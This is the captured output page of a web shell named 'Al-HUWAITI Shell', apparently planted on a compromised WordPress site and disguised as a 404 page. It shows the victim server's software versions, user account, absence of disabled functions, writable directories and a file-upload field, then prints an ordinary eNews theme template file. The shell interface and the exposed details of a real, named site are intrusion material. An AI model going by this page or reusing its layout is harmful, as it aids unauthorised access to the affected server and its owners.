hello 404 Not Found
Al-HUWAITI Shell
Al-huwaiti


Server : Apache/2.4.52 (Ubuntu)
System : Linux HAN2 5.15.0-185-generic #195-Ubuntu SMP Fri Jun 19 17:11:50 UTC 2026 x86_64
User : servadmin ( 1000)
PHP Version : 8.1.2-1ubuntu2.25
Disable Function : NONE
Directory :  /www/docs/www.obusignal.com/www.obusignal.com/wp-content/themes/eNews/includes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /www/docs/www.obusignal.com/www.obusignal.com/wp-content/themes/eNews/includes/blogstyleindex.php
<div id="post-top">
	<div class="breadcrumb">
		<?php if(function_exists('bcn_display')) { bcn_display(); } 
		else { ?>
			<?php if( is_tag() ) { ?>
				<?php _e('You are currently viewing','eNews') ?>: <em><?php _e('Posts Tagged &quot;','eNews') ?> <?php single_tag_title(); ?>&quot;</em>
			<?php } elseif (is_day()) { ?>
				<?php _e('You are currently viewing','eNews') ?>: <em><?php _e('Posts made in','eNews') ?> <?php the_time('F jS, Y'); ?></em>
			<?php } elseif (is_month()) { ?>
				<?php _e('You are currently viewing','eNews') ?>: <em><?php _e('Posts made in','eNews') ?> <?php the_time('F, Y'); ?></em>
			<?php } elseif (is_year()) { ?>
				<?php _e('You are currently viewing','eNews') ?>: <em><?php _e('Posts made in','eNews') ?> <?php the_time('Y'); ?></em>
			<?php } elseif (is_search()) { ?>
				<?php _e('Search results for','eNews') ?>: <em><?php the_search_query() ?></em>
			<?php } ?>
		<?php }; ?>
	</div> <!-- end breadcrumb -->	
</div> <!-- end post-top -->	

<div id="main-area-wrap">
	<div id="wrapper">
		<div id="main" class="noborder">
<?php 
if (is_archive() || is_search() || is_tag()) {
	if (is_archive()) $post_number = get_option('enews_archivenum_posts');
	if (is_search()) $post_number = get_option('enews_searchnum_posts');
	if (is_tag()) $post_number = get_option('enews_tagnum_posts');
	global $query_string; query_posts($query_string . "&showposts=$post_number&paged=$paged");
}
?>	
<?php if (have_posts()) : while (have_posts()) : the_post(); ?>
	
	<h1 class="post-title"><a href="<?php the_permalink() ?>" title="<?php printf(__('Permanent Link to %s','eNews'), get_the_title()) ?>"><?php the_title() ?></a></h1>
			<span class="meta-comments"><?php comments_popup_link(__('0 comments','eNews'), __('1 comment','eNews'), '% '.__('comments','eNews')); ?></span>
			
			<?php if (get_option('enews_postinfo') <> '') { ?>
				<div class="post-meta">
					<div class="post-meta-bottom">
						<p><?php _e('Posted','eNews') ?> <?php if (in_array('author', get_option('enews_postinfo'))) { ?> <?php _e('by','eNews') ?> <span class="author"><?php the_author() ?></span><?php }; ?><?php if (in_array('date', get_option('enews_postinfo'))) { ?> <?php _e('on','eNews') ?> <?php the_time(get_option('enews_date_format')) ?><?php }; ?><?php if (in_array('categories', get_option('enews_postinfo'))) { ?> <?php _e('in','eNews') ?> <?php the_category(', ') ?><?php }; ?><?php if (in_array('comments', get_option('enews_postinfo'))) { ?> | <?php comments_popup_link(__('0 comments','eNews'), __('1 comment','eNews'), '% '.__('comments','eNews')); ?><?php }; ?></p>
 					</div>	
				</div>
			<?php }; ?>
			
			<div id="post-content"> 
			
<?php if (get_option('enews_thumbnails') == 'on') { ?>

	<?php $width = 127;
		  $height = 127;
		  $classtext = 'thumbnail alignleft';
		  $titletext = get_the_title();
		
		  $thumbnail = get_thumbnail($width,$height,$classtext,$titletext,$titletext);
		  $thumb = $thumbnail["thumb"]; ?>

	<?php if($thumb <> '') { ?>
		<?php print_thumbnail($thumb, $thumbnail["use_timthumb"], $titletext, $width, $height, $classtext); ?>
	<?php }; ?>

<?php }; ?>
				<?php the_content(); ?>
				<?php edit_post_link(__('Edit this post','eNews')); ?>
			</div> <!-- end post-content -->
			<br class="clearfix"/>
<?php endwhile; ?>

<?php if(function_exists('wp_pagenavi')) { wp_pagenavi(); } 
else { ?>
<p class="pagination">
    <?php next_posts_link(__('&laquo; Previous Entries','eNews')) ?>
	<?php previous_posts_link(__('Next Entries &raquo;','eNews')) ?>
</p>
<?php } ?>

<?php else : ?>
	<!--If no results are found-->
	<div id="post-content"> 
		<h1><?php _e('No Results Found','eNews') ?></h1>
		<p><?php _e('The page you requested could not be found. Try refining your search, or use the navigation above to locate the post.','eNews') ?></p>
	</div>
	<!--End if no results are found-->
<?php endif; ?>
<?php if (is_archive() || is_search() || is_tag()) wp_reset_query(); ?>
		</div> <!-- end main -->

Al-HUWAITI Shell